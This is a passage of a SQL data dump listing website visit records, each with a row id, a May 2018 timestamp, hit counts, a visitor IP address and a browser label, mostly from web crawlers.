30040,1,1,0,0,'54.36.148.70','other'),(247628,1526730165,1,1,0,0,'54.36.149.0','other'),(247629,1526730179,1,1,0,0,'54.36.148.117','other'),(247630,1526730184,2,2,0,0,'217.69.133.3','other'),(247631,1526730368,1,1,0,0,'8.29.198.27','other'),(247632,1526730397,1,1,0,0,'35.226.23.240','other'),(247633,1526730403,1,1,0,0,'54.36.148.92','other'),(247634,1526730422,1,1,0,0,'54.36.148.235','other'),(247635,1526730446,1,1,0,0,'54.36.149.12','other'),(247636,1526730549,1,1,0,0,'217.69.133.4','other'),(247637,1526730693,1,1,0,0,'54.36.148.96','other'),(247638,1526730766,1,1,0,0,'54.36.149.26','other'),(247639,1526730878,1,1,0,0,'54.36.148.180','other'),(247640,1526731023,1,1,0,0,'54.36.148.25','other'),(247641,1526731090,1,1,0,0,'54.36.148.177','other'),(247642,1526731473,1,1,0,0,'54.36.148.245','other'),(247643,1526731629,1,1,0,0,'216.244.66.237','other'),(247644,1526731646,1,1,0,0,'54.36.148.174','other'),(247645,1526731789,1,1,0,0,'54.36.149.33','other'),(247646,1526731997,1,1,0,0,'54.36.148.193','other'),(247647,1526732019,1,1,0,0,'54.36.148.236','other'),(247648,1526732197,1,1,0,0,'54.36.148.45','other'),(247649,1526732392,1,1,0,0,'54.36.149.82','other'),(247650,1526732811,1,1,0,0,'216.244.66.237','other'),(247651,1526733380,1,0,1,0,'66.249.64.29',''),(247652,1526733891,1,1,0,0,'54.36.148.145','other'),(247653,1526733969,1,1,0,0,'217.69.133.3','other'),(247654,1526734059,1,1,0,0,'54.36.149.98','other'),(247655,1526734962,1,1,0,0,'54.36.149.67','other'),(247656,1526735045,1,1,0,0,'54.36.148.146','other'),(247657,1526735219,1,1,0,0,'54.36.149.89','other'),(247658,1526735238,1,1,0,0,'217.69.133.2','other'),(247659,1526735411,1,1,0,0,'54.36.148.22','other'),(247660,1526735501,1,1,0,0,'54.36.148.155','other'),(247661,1526735592,1,1,0,0,'54.36.148.161','other'),(247662,1526735621,1,1,0,0,'54.36.149.72','other'),(247663,1526735630,1,1,0,0,'54.36.149.70','other'),(247664,1526735759,1,1,0,0,'54.36.148.59','other'),(247665,1526735891,1,1,0,0,'207.46.13.141','other'),(247666,1526735954,1,1,0,0,'54.36.148.52','other'),(247667,1526736004,1,1,0,0,'8.29.198.26','other'),(247668,1526736366,1,1,0,0,'54.36.148.140','other'),(247669,1526736478,1,1,0,0,'54.36.148.197','other'),(247670,1526736601,1,1,0,0,'54.36.148.151','other'),(247671,1526736730,1,1,0,0,'54.36.149.88','other'),(247672,1526737098,1,1,0,0,'54.36.148.199','other'),(247673,1526737155,1,1,0,0,'54.36.148.71','other'),(247674,1526737182,1,1,0,0,'216.244.66.237','other'),(247675,1526737185,1,1,0,0,'162.210.196.129','other'),(247676,1526737794,1,0,1,0,'66.249.64.28',''),(247677,1526738139,1,1,0,0,'54.36.148.119','other'),(247678,1526738379,1,1,0,0,'91.196.178.102','firefox'),(247679,1526738793,1,1,0,0,'54.36.148.179','other'),(247680,1526738969,1,1,0,0,'54.36.148.227','other'),(247681,1526738984,1,1,0,0,'54.36.148.105','other'),(247682,1526739036,1,1,0,0,'141.8.142.74','other'),(247683,1526739046,1,1,0,0,'54.36.148.226','other'),(247684,1526739059,2,2,0,0,'216.244.66.237','other'),(247685,1526739589,1,1,0,0,'54.36.148.80','other'),(247686,1526740557,1,1,0,0,'54.36.148.109','other'),(247687,1526741219,1,1,0,0,'8.29.198.25','other'),(247688,1526741540,1,1,0,0,'54.36.148.203','other'),(247689,1526742130,1,1,0,0,'54.36.148.74','other'),(247690,1526742267,2,2,0,0,'54.36.148.168','other'),(247691,1526742269,1,1,0,0,'54.36.148.76','other'),(247692,1526742414,1,1,0,0,'157.55.39.77','other'),(247693,1526742566,1,1,0,0,'54.36.149.29','other'),(247694,1526742921,1,1,0,0,'157.55.39.176','other'),(247695,1526743204,1,1,0,0,'54.36.148.75','other'),(247696,1526743298,1,1,0,0,'54.36.148.106','other'),(247697,1526743549,1,1,0,0,'54.36.148.14','other'),(247698,1526743830,1,1,0,0,'54.36.148.181','other'),(247699,1526744002,1,1,0,0,'188.93.56.216','firefox'),(247700,1526744544,1,1,0,0,'54.36.149.0','other'),(247701,1526744638,1,1,0,0,'141.8.142.96','other'),(247702,1526745122,1,1,0,0,'180.76.15.6','other'),(247703,1526745339,1,1,0,0,'54.36.149.21','other'),(247704,1526745630,1,1,0,0,'54.36.149.48','other'),(247705,1526745660,1,1,0,0,'54.36.149.93','other'),(247706,1526745666,1,1,0,0,'54.36.148.28','other'),(247707,1526745830,1,1,0,0,'216.244.66.237','other'),(247708,1526745887,1,1,0,0,'54.36.148.212','other'),(247709,1526746031,1,1,0,0,'54.36.148.101','other'),(247710,1526746038,1,1,0,0,'54.36.148.237','other'),(247711,1526746130,1,1,0,0,'217.69.133.9','other'),(247712,1526746572,1,1,0,0,'54.36.148.233','other'),(247713,1526746581,1,1,0,0,'54.36.148.247','other'),(247714,1526746603,1,1,0,0,'54.36.148.71','other'),(247715,1526746831,1,1,0,0,'8.29.198.27','other'),(247716,1526746908,1,1,0,0,'54.36.148.26','other'),(247717,1526747111,1,1,0,0,'37.204.202.59','firefox'),(247718,1526747643,1,1,0,0,'217.69.133.6','other'),(247719,1526747750,1,1,0,0,'217.69.133.203','other'),(247720,1526747764,1,1,0,0,'217.69.133.194','other'),(247721,1526747944,1,1,0,0,'54.36.149.89','other'),(247722,1526748014,1,1,0,0,'54.36.148.86','other'),(247723,1526748442,2,2,0,0,'207.46.13.141','other'),(247724,1526749633,1,1,0,0,'91.196.178.132','firefox'),(247725,1526752056,1,1,0,0,'8.29.198.26','other'),(247726,1526752333,1,1,0,0,'157.55.39.77','other'),(247727,1526752546,1,1,0,0,'178.154.171.88','other'),(247728,1526752780,1,1,0,0,'141.8.142.74','other'),(247729,1526753649,2,2,0,0,'54.36.148.14','other'),(247730,1526753689,1,1,0,0,'54.36.149.0','other'),(247731,1526753859,1,1,0,0,'54.36.148.175','other'),(247732,1526753887,1,1,0,0,'54.36.149.15','other'),(247733,1526753935,1,1,0,0,'54.36.148.28','other'),(247734,1526754510,1,1,0,0,'54.36.148.170','other'),(247735,1526754756,1,1,0,0,'54.36.148.87','other'),(247736,1526754942,1,1,0,0,'35.226.23.240','other'),(247737,1526755017,1,1,0,0,'54.36.148.166','other'),(247738,1526755647,1,1,0,0,'54.36.148.132','other'),(247739,1526756286,1,1,0,0,'54.36.148.52','other'),(247740,1526756305,1,1,0,0,'54.36.148.55','other'),(247741,1526756314,1,1,0,0,'54.36.149.65','other'),(247742,1526756371,1,1,0,0,'54.36.148.145','other'),(247743,1526756476,1,1,0,0,'54.36.148.24','other'),(247744,1526756622,1,1,0,0,'54.36.149.25','other'),(247745,1526756711,1,1,0,0,'54.36.149.55','other'),(247746,1526757036,1,1,0,0,'54.36.148.11','other'),(247747,1526757278,1,1,0,0,'54.36.149.64','other'),(247748,1526757343,1,1,0,0,'178.154.171.88','other'),(247749,1526757365,1,1,0,0,'54.36.148.229','other'),(247750,1526757455,1,1,0,0,'54.36.148.238','other'),(247751,1526757560,1,1,0,0,'54.36.148.102','other'),(247752,1526757593,1,1,0,0,'54.36.148.156','other'),(247753,1526757672,1,1,0,0,'8.29.198.27','other'),(247754,1526757725,1,1,0,0,'141.8.142.74','other'),(247755,1526758251,1,1,0,0,'54.36.149.86','other'),(247756,1526758255,1,1,0,0,'54.36.148.227','other'),(247757,1526758492,1,1,0,0,'54.36.149.93','other'),(247758,1526759159,1,1,0,0,'54.36.149.37','other'),(247759,1526759202,1,1,0,0,'54.36.149.106','other'),(247760,1526759387,1,1,0,0,'37.9.113.182','other'),(247761,1526759678,1,1,0,0,'207.46.13.141','other'),(247762,1526759681,1,1,0,0,'54.36.148.70','other'),(247763,1526760057,1,0,1,0,'66.249.66.155',''),(247764,1526760151,1,1,0,0,'87.250.224.46','other'),(247765,1526760288,1,1,0,0,'54.36.149.59','other'),(247766,1526760511,1,1,0,0,'54.36.149.77','other'),(247767,1526760718,1,1,0,0,'193.106.30.99','firefox'),(247768,1526760749,1,1,0,0,'54.36.148.250','other'),(247769,1526760843,1,1,0,0,'54.36.148.218','other'),(247770,1526761029,1,1,0,0,'54.36.149.61','other'),(247771,1526761362,1,1,0,0,'54.36.149.90','other'),(247772,1526761495,1,0,1,0,'66.249.64.28',''),(247773,1526761777,1,1,0,0,'216.244.66.237','other'),(247774,1526762357,1,1,0,0,'54.36.148.12','other'),(247775,1526762518,1,1,0,0,'54.36.148.54','other'),(247776,1526762792,1,1,0,0,'178.255.215.94','other'),(247777,1526762915,1,1,0,0,'8.29.198.27','other'),(247778,1526762975,1,1,0,0,'54.36.148.183','other'),(247779,1526763146,1,1,0,0,'54.36.148.218','other'),(247780,1526763749,1,1,0,0,'54.36.148.222','other'),(247781,1526763853,1,1,0,0,'54.36.148.99','other'),(247782,1526764023,1,1,0,0,'54.36.148.166','other'),(247783,1526764086,1,1,0,0,'54.36.148.11','other'),(247784,1526764275,1,1,0,0,'54.36.149.15','other'),(247785,1526764387,1,1,0,0,'54.36.148.12','other'),(247786,1526764504,1,1,0,0,'54.36.148.116','other'),(247787,1526764696,1,1,0,0,'54.36.148.221','other'),(247788,1526764853,1,1,0,0,'54.36.148.17','other'),(247789,1526765217,1,1,0,0,'54.36.148.140','other'),(247790,1526765757,1,1,0,0,'54.36.149.86','other'),(247791,1526765833,1,1,0,0,'54.36.148.54','other'),(247792,1526766026,1,1,0,0,'54.36.148.201','other'),(247793,1526766204,1,1,0,0,'54.36.148.216','other'),(247794,1526766483,1,1,0,0,'54.36.148.193','other'),(247795,1526766598,1,1,0,0,'54.36.148.235','other'),(247796,1526766611,1,1,0,0,'54.36.148.166','other'),(247797,1526767014,1,1,0,0,'54.36.148.87','other'),(247798,1526767026,1,1,0,0,'54.36.148.11','other'),(247799,1526767221,1,1,0,0,'54.36.148.23','other'),(247800,1526767903,1,1,0,0,'54.36.148.243','other'),(247801,1526767941,1,1,0,0,'54.36.148.229','other'),(247802,1526768257,1,1,0,0,'54.36.148.14','other'),(247803,1526768489,1,1,0,0,'54.36.148.91','other'),(247804,1526768503,1,1,0,0,'8.29.198.27','other'),(247805,1526768532,1,1,0,0,'54.36.149.85','other'),(247806,1526768735,1,1,0,0,'54.36.148.171','other'),(247807,1526769036,1,1,0,0,'54.36.148.202','other'),(247808,1526769189,1,1,0,0,'54.36.148.65','other'),(247809,1526769217,1,1,0,0,'54.36.148.15','other'),(247810,1526769252,1,1,0,0,'54.36.149.91','other'),(247811,1526769337,1,1,0,0,'54.36.149.29','other'),(247812,1526769366,2,2,0,0,'141.8.142.74','other'),(247813,1526769436,1,1,0,0,'54.36.148.113','other'),(247814,1526769438,1,1,0,0,'54.36.149.42','other'),(247815,1526769898,1,1,0,0,'37.9.113.182','other'),(247816,1526770099,1,1,0,0,'54.36.149.9','other'),(247817,1526770267,1,1,0,0,'54.36.149.62','other'),(247818,1526770279,1,1,0,0,'54.36.148.55','other'),(247819,1526770348,1,1,0,0,'54.36.148.247','other'),(247820,1526770479,1,1,0,0,'54.36.149.40','other'),(247821,1526770625,1,1,0,0,'54.36.148.42','other'),(247822,1526770929,1,1,0,0,'54.36.148.235','other'),(247823,1526771052,1,1,0,0,'54.36.149.10','other'),(247824,1526771115,1,1,0,0,'54.36.149.7','other'),(247826,1526771253,1,1,0,0,'54.36.149.83','other'),(247827,1526771302,1,1,0,0,'54.36.148.120','other'),(247828,1526771393,1,1,0,0,'216.244.66.237','other'),(247829,1526771649,1,1,0,0,'54.36.148.173','other'),(247830,1526771693,1,1,0,0,'54.36.148.112','other'),(247831,1526771777,1,1,0,0,'54.36.149.68','other'),(247832,1526772012,1,1,0,0,'66.249.64.30','chrome'),(247833,1526772041,2,2,0,0,'66.249.64.29','chrome'),(247834,1526772048,1,1,0,0,'66.249.64.28','chrome'),(247835,1526772057,1,1,0,0,'87.250.224.46','other'),(247836,1526772369,1,1,0,0,'54.36.148.217','other'),(247837,1526772433,1,1,0,0,'54.36.148.157','other'),(247838,1526772439,1,1,0,0,'54.36.148.94','other'),(247839,1526772509,1,1,0,0,'54.36.148.179','other'),(247840,1526772759,1,1,0,0,'54.36.148.134','other'),(247841,1526772838,1,1,0,0,'54.36.148.52','other'),(247842,1526773090,1,1,0,0,'54.36.148.79','other'),(247843,1526773248,1,1,0,0,'54.36.149.17','other'),(247844,1526773438,1,1,0,0,'54.36.149.100','other'),(247845,1526773754,1,1,0,0,'8.29.198.26','other'),(247846,1526773796,1,1,0,0,'54.36.148.78','other'),(247847,1526774168,1,1,0,0,'54.36.149.18','other'),(247848,1526774267,1,1,0,0,'54.36.148.42','other'),(247849,1526774293,1,1,0,0,'54.36.148.155','other'),(247850,1526774316,1,1,0,0,'54.36.148.189','other'),(247851,1526774823,1,0,1,0,'66.249.70.29',''),(247852,1526774876,1,1,0,0,'54.36.149.52','other'),(247853,1526774925,1,1,0,0,'54.36.149.42','other'),(247854,1526775408,1,1,0,0,'54.36.149.63','other'),(247855,1526775443,1,1,0,0,'54.36.148.69','other'),(247856,1526775856,1,1,0,0,'54.36.149.43','other'),(247857,1526775975,1,1,0,0,'54.36.148.165','other'),(247858,1526776238,1,1,0,0,'54.36.148.39','other'),(247859,1526776327,1,1,0,0,'54.36.148.97','other'),(247860,1526776466,1,1,0,0,'54.36.149.59','other'),(247861,1526776515,1,1,0,0,'54.36.148.47','other'),(247862,1526776826,1,1,0,0,'54.36.148.236','other'),(247863,1526776841,1,1,0,0,'54.36.148.75','other'),(247864,1526776930,1,1,0,0,'167.114.172.223','other'),(247865,1526776946,1,1,0,0,'167.114.172.223','chrome'),(247866,1526777290,1,1,0,0,'54.36.148.170','other'),(247867,1526777305,1,1,0,0,'54.36.149.0','other'),(247868,1526777570,1,1,0,0,'54.36.149.104','other'),(247869,1526777643,1,1,0,0,'54.36.148.244','other'),(247870,1526777759,1,0,1,0,'66.249.64.30',''),(247871,1526777805,2,0,2,0,'66.249.64.28',''),(247872,1526777973,1,1,0,0,'54.36.148.151','other'),(247873,1526778104,1,1,0,0,'54.36.148.218','other'),(247874,1526778113,1,1,0,0,'54.36.149.48','other'),(247875,1526778286,1,1,0,0,'178.154.171.88','other'),(247876,1526778751,1,1,0,0,'54.36.148.62','other'),(247877,1526778798,1,1,0,0,'54.36.148.214','other'),(247878,1526779337,1,1,0,0,'8.29.198.27','other'),(247879,1526779927,1,1,0,0,'47.96.233.88','other'),(247880,1526780094,1,1,0,0,'54.36.148.62','other'),(247881,1526780223,1,1,0,0,'54.36.148.210','other'),(247882,1526780276,1,1,0,0,'54.36.148.46','other'),(247883,1526781106,1,1,0,0,'54.36.149.80','other'),(247884,1526781208,1,1,0,0,'54.36.149.16','other'),(247885,1526781826,1,1,0,0,'54.36.148.177','other'),(247886,1526781885,1,1,0,0,'54.36.148.148','other'),(247887,1526782188,3,3,0,0,'216.244.66.237','other'),(247888,1526782747,1,1,0,0,'54.36.149.7','other'),(247889,1526782780,1,1,0,0,'54.36.149.100','other'),(247890,1526783226,1,1,0,0,'54.36.148.194','other'),(247891,1526783520,1,1,0,0,'54.36.148.238','other'),(247892,1526783805,1,1,0,0,'54.36.148.226','other'),(247893,1526783889,1,1,0,0,'54.36.148.227','other'),(247894,1526783901,1,1,0,0,'54.36.149.26','other'),(247895,1526784158,1,1,0,0,'157.55.39.77','other'),(247896,1526784209,1,1,0,0,'54.36.149.9','other'),(247897,1526784585,1,1,0,0,'54.36.148.251','other'),(247898,1526784590,1,1,0,0,'8.29.198.26','other'),(247899,1526785000,1,1,0,0,'54.36.148.113','other'),(247900,1526785150,1,1,0,0,'54.36.148.177','other'),(247901,1526785406,1,1,0,0,'54.36.148.217','other'),(247902,1526785715,1,1,0,0,'54.36.148.28','other'),(247903,1526785977,1,1,0,0,'54.36.148.68','other'),(247904,1526786017,1,1,0,0,'54.36.148.229','other'),(247905,1526786170,1,1,0,0,'54.36.148.35','other'),(247906,1526787046,1,1,0,0,'54.36.148.157','other'),(247907,1526787103,1,1,0,0,'54.36.148.92','other'),(247908,1526787105,1,1,0,0,'54.36.148.225','other'),(247909,1526787354,1,1,0,0,'54.36.148.201','other'),(247910,1526787458,1,1,0,0,'95.216.19.207','other'),(247911,1526787543,1,1,0,0,'91.196.178.131','chrome'),(247912,1526788174,1,1,0,0,'54.36.148.96','other'),(247913,1526788555,1,1,0,0,'54.36.148.56','other'),(247914,1526788729,1,1,0,0,'54.36.148.23','other'),(247915,1526788776,1,1,0,0,'157.55.39.176','other'),(247916,1526789001,1,1,0,0,'54.36.148.127','other'),(247917,1526789018,1,1,0,0,'54.36.148.82','other'),(247918,1526789196,1,1,0,0,'54.36.149.45','other'),(247919,1526789201,1,1,0,0,'54.36.148.159','other'),(247920,1526789203,1,1,0,0,'54.36.148.254','other'),(247921,1526789258,1,1,0,0,'54.36.149.43','other'),(247922,1526789479,1,1,0,0,'54.36.149.89','other'),(247923,1526789525,1,1,0,0,'54.36.148.215','other'),(247924,1526790171,1,1,0,0,'8.29.198.25','other'),(247925,1526790223,1,0,1,0,'66.249.64.30',''),(247926,1526790335,1,1,0,0,'54.36.148.15','other'),(247927,1526790641,1,1,0,0,'54.36.148.51','other'),(247928,1526790837,1,1,0,0,'141.8.142.74','other'),(247929,1526791071,1,1,0,0,'54.36.149.53','other'),(247930,1526791411,1,1,0,0,'54.36.149.58','other'),(247931,1526791676,1,1,0,0,'54.36.149.2','other'),(247932,1526791781,1,1,0,0,'54.36.148.158','other'),(247933,1526791902,1,1,0,0,'54.36.148.237','other'),(247934,1526792069,1,1,0,0,'54.36.149.64','other'),(247935,1526792139,1,1,0,0,'178.255.215.94','other'),(247936,1526792244,1,1,0,0,'54.36.148.48','other'),(247937,1526792640,1,1,0,0,'54.36.149.86','other'),(247938,1526792641,1,1,0,0,'54.36.149.57','other'),(247939,1526793077,1,1,0,0,'141.8.142.74','other'),(247940,1526793082,1,1,0,0,'178.154.171.88','other'),(247941,1526793277,1,1,0,0,'54.36.148.155','other'),(247942,1526793363,1,1,0,0,'54.36.148.216','other'),(247943,1526793458,1,1,0,0,'54.36.149.1','other'),(247944,1526793804,1,1,0,0,'54.36.148.97','other'),(247945,1526794000,1,0,1,0,'66.249.64.30',''),(247946,1526794157,1,1,0,0,'54.36.149.44','other'),(247947,1526794212,1,1,0,0,'54.36.148.30','other'),(247948,1526794541,1,1,0,0,'54.36.148.91','other'),(247949,1526794742,1,1,0,0,'35.226.23.240','other'),(247950,1526794930,1,1,0,0,'54.36.148.136','other'),(247951,1526794950,1,1,0,0,'141.8.142.74','other'),(247952,1526795185,1,1,0,0,'54.36.149.13','other'),(247953,1526795429,1,1,0,0,'8.29.198.25','other'),(247954,1526795473,1,1,0,0,'54.36.148.209','other'),(247955,1526795492,1,0,1,0,'66.249.64.28',''),(247956,1526795795,1,1,0,0,'54.36.148.74','other'),(247957,1526795816,1,1,0,0,'54.36.149.14','other'),(247958,1526796332,1,1,0,0,'216.244.66.237','other'),(247959,1526796555,1,1,0,0,'66.249.64.29','chrome'),(247960,1526797531,1,0,1,0,'66.249.64.30',''),(247961,1526797631,1,1,0,0,'54.36.148.59','other'),(247962,1526797916,1,1,0,0,'180.76.15.157','other'),(247963,1526798051,1,1,0,0,'54.36.148.121','other'),(247964,1526798499,1,1,0,0,'66.249.64.28','chrome'),(247965,1526798547,1,1,0,0,'54.36.149.21','other'),(247966,1526798634,1,1,0,0,'54.165.59.7','other'),(247967,1526798956,1,1,0,0,'54.36.148.238','other'),(247968,1526798976,1,1,0,0,'46.211.132.229','other'),(247969,1526799273,1,1,0,0,'54.36.148.43','other'),(247970,1526799605,1,1,0,0,'54.36.148.136','other'),(247971,1526800034,1,1,0,0,'54.36.149.99','other'),(247972,1526800481,1,1,0,0,'216.244.66.237','other'),(247973,1526800747,1,1,0,0,'54.36.148.68','other'),(247974,1526801015,1,1,0,0,'8.29.198.26','other'),(247975,1526801240,1,1,0,0,'54.36.148.157','other'),(247976,1526801247,1,1,0,0,'54.36.148.218','other'),(247977,1526801368,2,2,0,0,'95.213.141.126','opera'),(247978,1526801506,1,1,0,0,'54.36.148.227','other'),(247979,1526801632,1,1,0,0,'87.250.224.46','other'),(247980,1526801866,1,1,0,0,'54.36.149.11','other'),(247981,1526802053,1,1,0,0,'54.36.149.96','other'),(247982,1526802094,1,1,0,0,'54.36.148.74','other'),(247983,1526802749,1,1,0,0,'54.36.148.221','other'),(247984,1526802881,1,1,0,0,'54.36.148.11','other'),(247985,1526802967,1,1,0,0,'54.36.148.48','other'),(247986,1526803019,1,1,0,0,'54.36.149.104','other'),(247987,1526803211,1,1,0,0,'54.36.148.186','other'),(247988,1526803313,1,1,0,0,'54.36.149.87','other'),(247989,1526803435,1,1,0,0,'54.36.148.187','other'),(247990,1526803724,1,1,0,0,'180.76.15.137','other'),(247991,1526803821,1,1,0,0,'54.36.148.92','other'),(247992,1526803924,1,1,0,0,'54.165.59.7','other'),(247993,1526804243,1,1,0,0,'54.36.148.211','other'),(247994,1526804413,1,1,0,0,'95.216.7.31','other'),(247995,1526804449,1,1,0,0,'54.36.149.103','other'),(247996,1526805154,1,1,0,0,'54.36.148.82','other'),(247997,1526805256,1,1,0,0,'178.140.119.217','msie'),(247998,1526805354,1,1,0,0,'54.36.149.27','other'),(247999,1526805370,1,1,0,0,'54.36.148.114','other'),(248000,1526805540,2,2,0,0,'149.202.210.13','chrome'),(248001,1526805628,1,1,0,0,'178.154.171.88','other'),(248002,1526805666,1,1,0,0,'54.36.148.238','other'),(248003,1526805939,1,1,0,0,'54.36.148.13','other'),(248004,1526806276,1,1,0,0,'8.29.198.27','other'),(248005,1526806324,1,1,0,0,'54.36.148.237','other'),(248006,1526806401,1,1,0,0,'54.36.148.194','other'),(248007,1526806548,1,1,0,0,'54.36.149.25','other'),(248008,1526806596,1,1,0,0,'54.36.148.224','other'),(248009,1526806675,1,1,0,0,'54.36.148.225','other'),(248010,1526806935,1,1,0,0,'54.36.148.126','other'),(248011,1526806946,1,1,0,0,'54.36.148.166','other'),(248012,1526807087,1,1,0,0,'141.8.142.167','other'),(248013,1526807911,2,2,0,0,'46.211.5.224','chrome'),(248014,1526807949,1,1,0,0,'54.165.59.7','other'),(248015,1526808196,1,1,0,0,'141.8.142.74','other'),(248016,1526808400,1,1,0,0,'216.244.66.237','other'),(248017,1526809464,1,1,0,0,'207.46.13.167','other'),(248018,1526811844,1,1,0,0,'8.29.198.26','other'),(248019,1526811876,1,1,0,0,'178.154.171.88','other'),(248020,1526812740,2,2,0,0,'216.244.66.237','other'),(248021,1526812743,1,1,0,0,'46.161.9.39','chrome'),(248022,1526813700,1,1,0,0,'92.112.228.57','chrome'),(248023,1526815806,1,1,0,0,'141.8.142.74','other'),(248024,1526816264,2,2,0,0,'178.154.171.88','other'),(248025,1526817129,1,1,0,0,'8.29.198.26','other'),(248026,1526818156,1,0,1,0,'66.249.70.27',''),(248027,1526819816,1,1,0,0,'178.154.171.88','other'),(248028,1526819953,1,1,0,0,'66.249.64.28','chrome'),(248029,1526821882,1,1,0,0,'40.77.167.189','other'),(248030,1526822437,1,1,0,0,'91.196.178.80','chrome'),(248031,1526822687,1,1,0,0,'8.29.198.25','other'),(248032,1526823134,1,1,0,0,'108.59.8.80','other'),(248033,1526824958,1,1,0,0,'37.73.56.82','chrome'),(248034,1526826049,1,1,0,0,'178.154.171.88','other'),(248035,1526826906,2,2,0,0,'54.36.148.240','other'),(248036,1526827248,1,1,0,0,'54.36.149.74','other'),(248037,1526827434,1,1,0,0,'54.36.148.163','other'),(248038,1526827852,1,1,0,0,'54.36.148.147','other'),(248039,1526827976,1,1,0,0,'8.29.198.25','other'),(248040,1526828544,1,1,0,0,'54.36.148.55','other'),(248041,1526829503,1,1,0,0,'167.114.219.41','other'),(248042,1526829611,1,1,0,0,'54.36.148.218','other'),(248043,1526829969,1,1,0,0,'141.8.142.74','other'),(248044,1526830436,1,1,0,0,'54.36.148.106','other'),(248045,1526830487,1,1,0,0,'180.76.15.9','other'),(248046,1526830797,1,1,0,0,'193.106.30.99','firefox'),(248047,1526830896,1,1,0,0,'54.36.148.253','other'),(248048,1526831027,2,2,0,0,'141.8.142.74','other'),(248049,1526831410,1,1,0,0,'54.36.149.106','other'),(248050,1526831430,1,1,0,0,'54.36.148.86','other'),(248051,1526831538,2,2,0,0,'92.113.126.173','chrome'),(248052,1526831678,1,1,0,0,'54.36.148.116','other'),(248053,1526831679,1,1,0,0,'54.36.149.99','other'),(248054,1526832358,1,1,0,0,'54.36.148.251','other'),(248055,1526832487,1,1,0,0,'180.76.15.143','other'),(248056,1526832877,1,1,0,0,'54.36.149.3','other'),(248057,1526832991,1,1,0,0,'54.36.148.191','other'),(248058,1526833188,1,1,0,0,'54.36.149.36','other'),(248059,1526833357,1,1,0,0,'54.36.149.106','other'),(248060,1526833412,1,1,0,0,'46.161.9.39','firefox'),(248061,1526833461,1,1,0,0,'207.46.13.18','other'),(248062,1526833522,1,1,0,0,'8.29.198.26','other'),(248063,1526833864,1,1,0,0,'54.36.148.82','other'),(248064,1526834038,1,1,0,0,'216.244.66.237','other'),(248065,1526834218,1,1,0,0,'54.36.149.70','other'),(248066,1526834605,1,1,0,0,'54.36.148.225','other'),(248067,1526835184,1,1,0,0,'54.36.148.95','other'),(248068,1526835234,1,1,0,0,'54.36.149.86','other'),(248069,1526835376,1,1,0,0,'54.36.148.245','other'),(248070,1526835522,1,1,0,0,'13.56.232.243','chrome'),(248071,1526835679,1,1,0,0,'54.36.148.78','other'),(248072,1526835885,1,1,0,0,'54.36.149.50','other'),(248073,1526836376,1,1,0,0,'54.36.148.62','other'),(248074,1526836586,1,1,0,0,'54.36.148.230','other'),(248075,1526836766,1,1,0,0,'54.36.148.196','other'),(248076,1526836978,1,1,0,0,'54.36.149.74','other'),(248077,1526837150,1,1,0,0,'54.36.148.14','other'),(248078,1526838250,1,1,0,0,'141.8.142.74','other'),(248079,1526838337,1,1,0,0,'54.36.148.136','other'),(248080,1526838695,1,1,0,0,'87.250.224.46','other'),(248081,1526838813,1,1,0,0,'8.29.198.27','other'),(248082,1526838817,1,1,0,0,'54.36.149.87','other'),(248083,1526838822,1,1,0,0,'54.36.148.254','other'),(248084,1526839024,1,0,1,0,'66.249.64.29',''),(248085,1526839319,1,1,0,0,'54.36.149.0','other'),(248086,1526839507,1,1,0,0,'54.36.149.56','other'),(248087,1526839934,1,1,0,0,'54.36.148.29','other'),(248088,1526839947,1,1,0,0,'87.250.224.46','other'),(248089,1526840222,1,1,0,0,'54.36.148.58','other'),(248090,1526840527,1,1,0,0,'54.36.149.62','other'),(248091,1526842649,1,1,0,0,'54.36.148.244','other'),(248092,1526842915,1,1,0,0,'207.46.13.18','other'),(248093,1526843201,1,1,0,0,'54.36.148.181','other'),(248094,1526843283,1,1,0,0,'54.36.149.12','other'),(248095,1526843545,1,1,0,0,'54.36.148.36','other'),(248096,1526843840,1,1,0,0,'216.244.66.237','other'),(248097,1526844016,1,1,0,0,'54.36.148.21','other'),(248098,1526844349,1,1,0,0,'54.36.149.101','other'),(248099,1526844363,1,1,0,0,'8.29.198.27','other'),(248100,1526845282,1,1,0,0,'35.226.23.240','other'),(248101,1526845319,1,1,0,0,'54.36.148.239','other'),(248102,1526845607,1,1,0,0,'54.36.149.17','other'),(248103,1526845665,1,1,0,0,'54.36.148.153','other'),(248104,1526845692,1,1,0,0,'54.36.148.177','other'),(248105,1526847037,1,1,0,0,'54.36.148.20','other'),(248106,1526847919,1,1,0,0,'54.36.148.145','other'),(248107,1526848280,1,1,0,0,'178.154.171.88','other'),(248108,1526848423,1,1,0,0,'54.36.148.90','other'),(248109,1526848543,1,1,0,0,'54.36.148.138','other'),(248110,1526848585,1,1,0,0,'54.36.148.24','other'),(248111,1526848606,1,1,0,0,'54.36.149.57','other'),(248112,1526848878,1,1,0,0,'54.36.149.104','other'),(248113,1526848963,1,1,0,0,'54.36.148.143','other'),(248114,1526849012,1,1,0,0,'54.36.148.212','other'),(248115,1526849125,1,1,0,0,'54.36.148.38','other'),(248116,1526849281,1,1,0,0,'35.226.23.240','other'),(248117,1526849596,1,1,0,0,'178.154.171.88','other'),(248118,1526849661,1,1,0,0,'8.29.198.26','other'),(248119,1526850471,1,1,0,0,'54.36.148.163','other'),(248120,1526850831,1,1,0,0,'54.36.148.87','other'),(248121,1526850901,1,1,0,0,'54.36.149.101','other'),(248122,1526850902,1,1,0,0,'54.36.149.76','other'),(248123,1526851251,1,1,0,0,'141.8.142.74','other'),(248124,1526851395,1,1,0,0,'54.36.148.230','other'),(248125,1526851552,1,1,0,0,'54.36.148.156','other'),(248126,1526851868,1,1,0,0,'40.77.167.189','other'),(248127,1526851954,1,1,0,0,'46.211.131.103','other'),(248128,1526852199,1,1,0,0,'54.36.149.7','other'),(248129,1526852425,1,1,0,0,'120.35.38.13','other'),(248130,1526853056,1,1,0,0,'54.36.149.98','other'),(248131,1526853186,1,1,0,0,'54.36.149.31','other'),(248132,1526853636,1,1,0,0,'141.8.142.74','other'),(248133,1526853641,1,1,0,0,'40.77.167.189','other'),(248134,1526854680,1,1,0,0,'54.36.149.37','other'),(248135,1526854715,1,1,0,0,'54.36.149.42','other'),(248136,1526855081,1,1,0,0,'54.36.149.80','other'),(248137,1526855180,1,1,0,0,'54.36.148.73','other'),(248138,1526855203,1,1,0,0,'8.29.198.26','other'),(248139,1526855221,1,1,0,0,'54.36.148.93','other'),(248140,1526855461,1,1,0,0,'54.36.148.47','other'),(248141,1526856050,1,1,0,0,'54.36.148.250','other'),(248142,1526856143,1,1,0,0,'54.36.148.101','other'),(248143,1526856326,1,1,0,0,'54.36.148.240','other'),(248144,1526856